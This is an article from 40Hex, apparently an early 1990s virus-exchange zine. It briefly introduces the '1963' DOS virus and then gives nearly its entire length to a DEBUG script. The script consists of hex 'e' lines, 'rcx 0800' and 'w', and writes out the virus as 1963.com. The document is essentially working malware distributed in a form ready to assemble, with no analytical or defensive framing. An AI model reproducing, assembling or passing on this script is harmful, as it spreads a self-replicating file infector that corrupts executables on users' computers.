40Hex Number 5 Volume 2 Issue 1 File 003 The 1963 Virus Here's a debug script of 1963. It's classified as an overwriting virus, but it attaches the code it overwrites onto the end of the file it infects... so it overwrites, but it doesn't. Sort of. ------------------------------------------------------------------------------- n 1963.com e 0100 B4 30 CD 21 3C 03 72 07 B8 00 12 CD 2F 3C FF B8 e 0110 0B 00 72 71 B4 4A BB 40 01 CD 21 72 68 FA 0E 17 e 0120 BC FE 13 E8 C5 00 FB A1 2C 00 0B C0 74 61 E8 BB e 0130 06 8E C0 33 FF 33 C0 AF 75 FD AF 8B D7 06 1F B4 e 0140 48 BB FF FF CD 21 B4 48 CD 21 8E C0 B4 49 CD 21 e 0150 33 C0 8B CB 8C C3 51 B9 08 00 33 FF F3 AB 43 8E e 0160 C3 59 E2 F2 0E 07 BB 04 09 8B FB AB B0 80 AB 8C e 0170 C8 AB B8 5C 00 AB 8C C8 AB B8 6C 00 AB 8C C8 AB e 0180 B8 00 4B CD 21 0E 1F E8 62 06 2E FF 2E 0A 00 B8 e 0190 20 12 BB 05 00 CD 2F 53 4B 4B 26 88 1D B8 16 12 e 01A0 CD 2F 4B 4B 26 89 1D B4 48 BB FF FF CD 21 B4 48 e 01B0 CD 21 8E D8 5B B8 00 42 33 C9 33 D2 CD 21 B4 3F e 01C0 BA 00 01 26 8B 4D 11 CD 21 72 BA B4 3E CD 21 B4 e 01D0 26 8C DA CD 21 4A 8E C2 26 8C 1E 01 00 42 8E C2 e 01E0 8E D2 BC FE FF 1E B8 00 01 50 CB 1E B8 03 12 CD e 01F0 2F 2E 8C 1E 04 09 33 F6 8E DE BF 88 02 8C CE 87 e 0200 3E 04 00 87 36 06 00 9C 9C 9C 8B EC 80 4E 01 01 e 0210 9D 9C 9C 2E C7 06 06 09 AF 08 B4 01 FF 1E 4C 00 e 0220 9D 2E C7 06 06 09 AB 08 B4 0B FF 1E 84 00 9D 89 e 0230 3E 04 00 89 36 06 00 1F 1E 06 8C CB BD AE 02 A1 e 0240 AB 08 8B 16 AD 08 33 F6 8E DE 3B 06 84 00 75 10 e 0250 3B 16 86 00 75 0A 89 2E 84 00 89 1E 86 00 EB 25 e 0260 B8 AB 08 8E C3 B9 10 00 FC 8B F8 8E DA A7 75 0B e 0270 A7 75 06 89 6C FC 89 5C FE 4E 4E 4E E2 EB 87 F1 e 0280 42 3B D3 75 E4 07 1F C3 55 8B EC 50 8B 46 04 2E e 0290 3B 06 04 09 77 15 53 2E 8B 1E 06 09 2E 89 47 02 e 02A0 8B 46 02 2E 89 07 80 66 07 FE 5B 58 5D CF 55 8B e 02B0 EC 80 FC 48 74 0A 80 FC 4A 74 05 3D 03 4B 75 0C e 02C0 E8 89 05 E8 AF 05 9C E8 87 05 EB 55 80 FC 31 74 e 02D0 05 80 FC 4C 75 0D 53 BB 13 00 E8 55 02 4B 79 FA e 02E0 5B EB 5F 80 FC 0F 74 0F 80 FC 10 74 0A 80 FC 17 e 02F0 74 05 80 FC 23 75 05 E8 25 05 EB 46 80 FC 3F 75 e 0300 25 E8 2E 02 73 06 B8 05 00 E9 F7 00 75 34 E8 64 e 0310 05 72 F6 9C E8 6D 05 1E 07 8B FA E8 67 04 E8 75 e 0320 05 9D 5D CA 02 00 80 FC 3D 74 0A 80 FC 43 74 05 e 0330 80 FC 56 75 05 E8 E1 01 EB 08 80 FC 3E 75 0E E8 e 0340 F0 01 FF 76 06 9D 5D FA 2E FF 2E AB 08 80 FC 14 e 0350 74 0D 80 FC 21 74 08 80 FC 27 74 03 E9 7F 00 E8 e 0360 BD 04 73 04 5D B0 01 CF 75 D8 E8 17 05 E8 A4 04 e 0370 80 FC 14 75 14 8B 44 0C BA 80 00 F7 E2 33 DB 02 e 0380 44 20 12 E3 13 DA 93 EB 06 8B 44 23 8B 5C 21 8B e 0390 4C 0E F7 E1 73 05 E8 FD 04 EB C9 93 F7 E1 03 D3 e 03A0 72 F4 2E A3 D0 08 2E 89 16 D2 08 2E 89 0E D4 08 e 03B0 E8 E3 04 E8 BF 04 0A C0 74 04 3C 03 75 1E E8 C3 e 03C0 04 80 FC 27 2E A1 D4 08 75 04 F7 E1 72 C8 50 B4 e 03D0 2F CD 21 8B FB 58 E8 AC 03 E8 BA 04 5D CF 3D 00 e 03E0 4B 74 2A 3D 01 4B 74 03 E9 57 FF E8 41 00 72 13 e 03F0 56 57 1E 0E 1F BE E2 08 8D 7F 0E FC A5 A5 A5 A5 e 0400 1F 5F 5E 9C D0 6E 06 9D D0 56 06 5D CF E8 1F 00 e 0410 72 F1 50 B4 51 CD 21 8E DB 8E C3 58 FA 2E 8B 26 e 0420 E2 08 2E 8E 16 E4 08 44 44 FB 2E FF 2E E6 08 E8 e 0430 52 04 F9 E8 E4 00 B8 0B 00 72 32 FC 9C 1E B8 22 e 0440 35 CD 21 2E 89 1E B7 08 2E 8C 06 B9 08 C5 76 0A e 0450 0E 07 BF D4 08 8B DF B9 07 00 F3 A5 1F E8 EC 03 e 0460 52 B8 01 4B E8 12 04 5A E8 E6 03 73 07 89 46 08 e 0470 E8 23 04 C3 89 46 08 B4 51 CD 21 8E C3 8B 76 00 e 0480 36 C5 54 02 26 89 16 0A 00 26 8C 1E 0C 00 B8 22 e 0490 25 CD 21 9D 75 DA 0E 1F BE 04 09 BF 00 01 B9 AB e 04A0 07 F3 A4 E8 B2 02 74 03 F8 EB C5 8B FB 83 C7 10 e 04B0 A1 B1 10 A3 E6 08 A1 B3 10 03 C7 A3 E8 08 8B 0E e 04C0 AF 10 0B C9 74 E2 C5 56 0E E8 96 03 72 35 8B D8 e 04D0 51 0E 1F 33 C9 8B 16 02 09 E8 8F 03 BA 04 09 59 e 04E0 51 B9 04 00 E8 7D 02 59 72 16 8B F2 1E 8B 44 02 e 04F0 8B 34 03 C7 8E D8 01 3C 1F E2 E5 E8 69 03 EB A8 e 0500 E8 64 03 06 1F 2E C4 1E B7 08 89 1E 0A 00 8C 06 e 0510 0E 00 E8 D7 02 F9 E9 1D FF F8 50 53 9C E8 42 03 e 0520 72 0C 8B D8 9D 9C E8 0A 00 9C E8 3A 03 9D 5B 5B e 0530 58 C3 F8 FC E8 4D 03 9C 53 B8 20 12 CD 2F 72 0C e 0540 32 FF 26 8A 1D B8 16 12 CD 2F 73 04 E8 47 03 C3 e 0550 06 0E 1F B8 23 35 CD 21 89 1E BB 08 8C 06 BD 08 e 0560 40 CD 21 89 1E BF 08 8C 06 C1 08 B4 25 BA 81 08 e 0570 CD 21 48 42 42 CD 21 07 5B B0 02 26 86 45 02 A2 e 0580 C9 08 26 8B 45 05 A3 CA 08 26 8B 45 15 A3 D0 08 e 0590 26 8B 45 17 A3 D2 08 26 8B 45 11 26 8B 55 13 A3 e 05A0 CC 08 89 16 CE 08 3D 1A 00 83 DA 00 72 55 9D 72 e 05B0 16 26 8B 45 28 3D 45 58 74 07 3D 43 4F 75 44 B0 e 05C0 4D 26 3A 45 2A 75 3C 33 C9 33 D2 E8 9D 02 BA EA e 05D0 08 B1 1A E8 8E 01 72 3D 33 C9 33 D2 E8 79 01 75 e 05E0 0B A1 F2 08 B2 10 F7 E2 8B CA 8B D0 51 52 81 C2 e 05F0 AB 07 83 D1 00 3B 0E CE 08 75 04 3B 16 CC 08 5A e 0600 59 76 02 EB 58 51 52 E8 61 02 BA 04 09 B9 AB 07 e 0610 E8 51 01 73 02 EB 3F 06 57 0E 07 BE EF 09 BF EB e 0620 01 B9 C3 00 F3 A6 5F 07 75 5F 8B D1 E8 41 02 B9 e 0630 AD 07 BA 04 09 E8 20 01 75 03 83 C1 06 26 01 4D e 0640 11 26 83 55 13 00 E8 1B 01 72 0B 8B F2 49 49 E8 e 0650 26 01 3B 14 74 03 F9 EB 08 3A C0 EB 04 B0 01 3C e 0660 00 9C BE C9 08 FC 47 47 A4 47 47 A5 83 C7 0A A5 e 0670 A5 A5 A5 B8 24 25 C5 16 BF 08 CD 21 48 2E C5 16 e 0680 BB 08 CD 21 9D E8 0E 02 C3 26 F6 45 04 04 75 CD e 0690 B4 0D CD 21 53 1E 06 B8 40 35 CD 21 89 1E C3 08 e 06A0 8C 06 C5 08 B0 13 CD 21 89 1E B3 08 8C 06 B5 08 e 06B0 B4 25 C5 16 AF 08 CD 21 B0 40 BA 59 EC BB 00 F0 e 06C0 8E DB CD 21 07 1F 5B 33 C9 33 D2 E8 A2 01 B9 AB e 06D0 07 BE 04 09 E8 81 00 75 15 83 C1 06 A1 F0 08 A3 e 06E0 AF 10 A1 FE 08 A3 B1 10 A1 00 09 A3 B3 10 56 E8 e 06F0 86 00 89 14 5A 41 41 E8 74 00 72 39 5A 59 E8 6A e 0700 01 BA 00 01 B9 AB 07 E8 64 00 72 2F E8 49 00 75 e 0710 20 33 C9 89 0E F0 08 89 16 FE 08 C7 06 00 09 F0 e 0720 FF 33 D2 E8 45 01 BA EA 08 B9 1A 00 E8 3F 00 72 e 0730 0A 3A C0 EB 07 B0 01 3C 00 EB 01 F9 9C B4 0D CD e 0740 21 1E B8 13 25 C5 16 B3 08 CD 21 B0 40 2E C5 16 e 0750 C3 08 CD 21 1F E9 0A FF A1 EA 08 3D 4D 5A 74 03 e 0760 3D 5A 4D C3 B4 3F E8 10 01 72 02 3B C1 C3 B4 40 e 0770 E8 06 01 72 02 3B C1 C3 51 33 D2 AC 02 D0 80 D6 e 0780 00 E2 F8 59 C3 0E 1F BE 04 09 8B D8 B9 AB 07 E8 e 0790 C6 FF 75 27 A1 F2 08 BA 10 00 F7 E2 53 57 E8 1E e 07A0 00 5F 5B BE EA 08 B9 1A 00 A1 AF 10 A3 F0 08 A1 e 07B0 B1 10 A3 FE 08 A1 B3 10 A3 00 09 33 C0 33 D2 2B e 07C0 06 D0 08 1B 16 D2 08 72 0A 75 20 2B D8 76 1C 03 e 07D0 F8 EB 0F F7 D8 83 D2 00 F7 DA 75 0F 2B C8 76 0B e 07E0 03 F0 3B CB 76 02 8B CB FC F3 A4 C3 9C E8 94 00 e 07F0 B4 49 1E 07 CD 21 B4 49 8E 06 2C 00 CD 21 B4 50 e 0800 8B 1E 16 00 CD 21 B8 22 25 C5 16 0A 00 CD 21 E8 e 0810 84 00 9D C3 8B F2 80 3C FF 75 03 83 C6 07 C3 E8 e 0820 62 00 E8 EF FF 0E 07 BA 04 09 8B FA FC AC 0A C0 e 0830 74 05 04 40 B4 3A AB A5 A5 A5 A5 B0 2E AA A5 A4 e 0840 32 C0 AA 06 1F E8 D1 FC E8 4B 00 C3 50 8C C8 EB e 0850 03 50 33 C0 53 1E 8C CB 4B 8E DB A3 01 00 1F 5B e 0860 58 C3 B8 00 3D EB 12 B4 3E EB 0E B8 00 42 EB 09 e 0870 B8 02 42 EB 04 FF 76 06 9D 9C FA 2E FF 1E AB 08 e 0880 C3 B0 03 CF 2E 8F 06 C7 08 1E 52 06 53 50 51 56 e 0890 57 55 8B EC EB 10 2E 8F 06 C7 08 8B E5 5D 5F 5E e 08A0 59 58 5B 07 5A 1F 2E FF 26 C7 08 00 00 00 00 00 e 08B0 00 00 00 00 00 44 83 00 00 44 83 00 00 44 83 00 e 08C0 00 44 83 00 00 44 83 00 00 00 00 00 00 00 00 00 e 08D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 rcx 0800 w q ------------------------------------------------------------------------------- DA